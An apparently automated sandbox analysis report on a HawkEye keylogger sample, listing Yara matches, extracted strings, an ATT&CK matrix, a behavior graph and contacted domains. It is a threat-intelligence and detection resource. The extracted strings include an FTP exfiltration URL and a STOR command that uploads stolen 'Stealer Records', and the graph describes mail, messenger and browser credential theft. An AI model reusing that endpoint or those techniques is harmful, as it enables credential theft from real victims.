                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4965c92.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4996408.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a20000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a29c0d.17.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41ce65.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.380b065.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490fe2d.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3803258.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a7fa72.18.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.41b460.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4a28208.19.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f1458.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f9265.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.490e428.11.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.415058.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.415058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.49edc72.14.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4997e0d.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.41b460.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.3809660.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.pjavpo.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.pjavpo.exe.20f7860.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.4990000.15.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.pjavpo.exe.2829258.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6660, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: pjavpo.exe PID: 6720, type: MEMORYSTR
                Detected HawkEye Rat
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: pjavpo.exe, 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: pjavpo.exeString found in binary or memory: HawkEyeKeylogger
                Source: pjavpo.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                Source: pjavpo.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                Source: pjavpo.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: pjavpo.exe, 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: pjavpo.exe, 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: pjavpo.exe, 00000005.00000002.496834741.00000000029B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qCBHawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
                Source: pjavpo.exe, 00000005.00000002.496834741.00000000029B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qcbftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
                Source: pjavpo.exe, 00000005.00000002.496834741.00000000029B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_760639%203.11.2022%2012:04:44%20PM.txt
                Source: pjavpo.exe, 00000005.00000002.496834741.00000000029B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qihftp://ftp.manchutimefashion.com/HawkEye_Keylogger_Stealer_Records_760639%203.11.2022%2012:04:44%20PM.txt
                Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: pjavpo.exe, 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: pjavpo.exe, 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HawkEyeKeylogger
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                Source: pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                Source: pjavpo.exe, 00000005.00000002.496896758.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qDC/HawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
                Source: pjavpo.exe, 00000005.00000002.496896758.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qCBHawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txtd8
                Source: pjavpo.exe, 00000005.00000002.496896758.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qJISTOR HawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
                Source: pjavpo.exe, 00000005.00000002.496896758.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: qISTOR HawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
                Source: pjavpo.exe, 00000005.00000002.496896758.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_760639 3.11.2022 12:04:44 PM.txt
                Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: pjavpo.exe, 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                Source: pjavpo.exe, 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02490F6E bind,
                Source: C:\Users\user\AppData\Local\Temp\pjavpo.exeCode function: 5_2_02490F3B bind,

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                1
                Replication Through Removable Media                		1
                Windows Management Instrumentation                		Path Interception1
                Access Token Manipulation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                System Time Discovery                		1
                Replication Through Removable Media                		11
                Archive Collected Data                		1
                Exfiltration Over Alternative Protocol                		4
                Ingress Tool Transfer                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default Accounts12
                Native API                		Boot or Logon Initialization Scripts411
                Process Injection                		11
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		1
                Peripheral Device Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth11
                Encrypted Channel                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Shared Modules                		Logon Script (Windows)Logon Script (Windows)31
                Obfuscated Files or Information                		2
                Credentials in Registry                		1
                Account Discovery                		SMB/Windows Admin Shares1
                Email Collection                		Automated Exfiltration1
                Non-Standard Port                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
                Software Packing                		1
                Credentials In Files                		2
                File and Directory Discovery                		Distributed Component Object Model1
                Input Capture                		Scheduled Transfer1
                Remote Access Software                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets28
                System Information Discovery                		SSH1
                Clipboard Data                		Data Transfer Size Limits3
                Non-Application Layer Protocol                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common21
                Virtualization/Sandbox Evasion                		Cached Domain Credentials1
                Query Registry                		VNCGUI Input CaptureExfiltration Over C2 Channel14
                Application Layer Protocol                		Jamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync51
                Security Software Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job411
                Process Injection                		Proc Filesystem21
                Virtualization/Sandbox Evasion                		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Hidden Files and Directories                		/etc/passwd and /etc/shadow3
                Process Discovery                		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                Application Window Discovery                		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                System Owner/User Discovery                		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                Remote System Discovery                		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskMasquerade Task or ServiceGUI Input Capture11
                System Network Configuration Discovery                		Exploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 587288 Sample: TGQfHfehsY Startdate: 11/03/2022 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 7 other signatures 2->37 8 TGQfHfehsY.exe 18 2->8         started        process3 file4 23 C:\Users\user\AppData\Local\Temp\pjavpo.exe, PE32 8->23 dropped 11 pjavpo.exe 8->11         started        process5 signatures6 47 May check the online IP address of the machine 11->47 14 pjavpo.exe 15 6 11->14         started        process7 dnsIp8 25 ftp.manchutimefashion.com 66.70.204.222, 21, 49782, 49783 OVHFR Canada 14->25 27 104.16.154.36, 443, 49772 CLOUDFLARENETUS United States 14->27 29 2 other IPs or domains 14->29 49 Changes the view of files in windows explorer (hidden files and folders) 14->49 51 Writes to foreign memory regions 14->51 53 Allocates memory in foreign processes 14->53 55 2 other signatures 14->55 18 vbc.exe 1 14->18         started        21 vbc.exe 2 14->21         started        signatures9 process10 signatures11 39 Tries to steal Mail credentials (via file registry) 18->39 41 Tries to steal Instant Messenger accounts or passwords 18->41 43 Tries to steal Mail credentials (via file / registry access) 18->43 45 Tries to harvest and steal browser information (history, passwords, etc) 21->45

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                TGQfHfehsY.exe32%VirustotalBrowse

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                3.2.pjavpo.exe.20e0000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                13.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
                5.0.pjavpo.exe.415058.10.unpack100%AviraTR/Inject.vcoldiDownload File
                5.0.pjavpo.exe.400000.9.unpack100%AviraHEUR/AGEN.1213281Download File
                5.0.pjavpo.exe.400000.0.unpack100%AviraTR/Inject.vcoldiDownload File
                5.2.pjavpo.exe.4a20000.16.unpack100%AviraTR/AD.MExecute.lzracDownload File
                5.2.pjavpo.exe.4a20000.16.unpack100%AviraSPR/Tool.MailPassView.473Download File
                5.0.pjavpo.exe.400000.5.unpack100%AviraHEUR/AGEN.1213281Download File
                5.2.pjavpo.exe.4990000.15.unpack100%AviraTR/Inject.vcoldiDownload File
                13.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
                5.0.pjavpo.exe.400000.8.unpack100%AviraHEUR/AGEN.1213281Download File
                5.2.pjavpo.exe.3803258.6.unpack100%AviraTR/Inject.vcoldiDownload File
                13.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
                12.0.vbc.exe.400000.1.unpack100%AviraSPR/Tool.MailPassView.473Download File
                5.0.pjavpo.exe.400000.4.unpack100%AviraHEUR/AGEN.1213281Download File
                13.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
                5.0.pjavpo.exe.400000.2.unpack100%AviraTR/Inject.vcoldiDownload File
                5.0.pjavpo.exe.415058.14.unpack100%AviraTR/Inject.vcoldiDownload File
                13.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File
                12.0.vbc.exe.400000.4.unpack100%AviraSPR/Tool.MailPassView.473Download File
                13.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
                3.2.pjavpo.exe.20f1458.2.unpack100%AviraTR/Inject.vcoldiDownload File
                5.2.pjavpo.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
                5.2.pjavpo.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
                5.0.pjavpo.exe.400000.3.unpack100%AviraTR/Inject.vcoldiDownload File
                5.2.pjavpo.exe.415058.3.unpack100%AviraTR/Inject.vcoldiDownload File
                5.0.pjavpo.exe.400000.13.unpack100%AviraHEUR/AGEN.1213281Download File
                5.0.pjavpo.exe.400000.1.unpack100%AviraTR/Inject.vcoldiDownload File
                12.0.vbc.exe.400000.2.unpack100%AviraSPR/Tool.MailPassView.473Download File
                5.0.pjavpo.exe.400000.6.unpack100%AviraHEUR/AGEN.1213281Download File
                12.0.vbc.exe.400000.3.unpack100%AviraSPR/Tool.MailPassView.473Download File
                5.0.pjavpo.exe.400000.7.unpack100%AviraHEUR/AGEN.1213281Download File
                12.0.vbc.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File

                Domains

                SourceDetectionScannerLabelLink
                ftp.manchutimefashion.com0%VirustotalBrowse
                63.155.11.0.in-addr.arpa0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%URL Reputationsafe
                http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.carterandcone.commg0%Avira URL Cloudsafe
                https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%URL Reputationsafe
                https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%URL Reputationsafe
                https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%URL Reputationsafe
                https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e0%URL Reputationsafe
                https://pki.goog/repository/00%URL Reputationsafe
                https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.founder.com.cn/cn/rL0%Avira URL Cloudsafe
                https://172.217.23.78/0%URL Reputationsafe
                http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z0%Avira URL Cloudsafe
                http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
                http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                https://whatismyipaddress.comx&Qqt0%Avira URL Cloudsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.sakkal.comuv0%Avira URL Cloudsafe
                http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM0%Avira URL Cloudsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.urwpp.de0%URL Reputationsafe
                https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ0%URL Reputationsafe
                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                http://www.fontbureau.com91S0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js0%URL Reputationsafe
                http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg0%URL Reputationsafe
                https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                whatismyipaddress.com
                		104.16.155.36
                		truefalse
                  		high
                  ftp.manchutimefashion.com
                  		66.70.204.222
                  		truetrueunknown
                  63.155.11.0.in-addr.arpa
                  		unknown
                  		unknownfalseunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://whatismyipaddress.com/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.com/chrome/static/css/main.v2.min.cssbhv8D09.tmp.13.drfalse
                      		high
                      https://www.msn.com//searchp/LinkId=255141vbc.exe, 0000000D.00000003.325673478.0000000002215000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQvbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drfalse
                          		high
                          https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637bhv8D09.tmp.13.drfalse
                            		high
                            http://www.msn.combhv8D09.tmp.13.drfalse
                              		high
                              http://www.fontbureau.com/designerspjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://deff.nelreports.net/api/report?cat=msnbhv8D09.tmp.13.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://contextual.media.net/__media__/js/util/nrrV9140.jsbhv8D09.tmp.13.drfalse
                                  		high
                                  https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsbhv8D09.tmp.13.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.pngbhv8D09.tmp.13.drfalse
                                    		high
                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Zbhv8D09.tmp.13.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1bhv8D09.tmp.13.drfalse
                                      		high
                                      https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsbhv8D09.tmp.13.drfalse
                                        		high
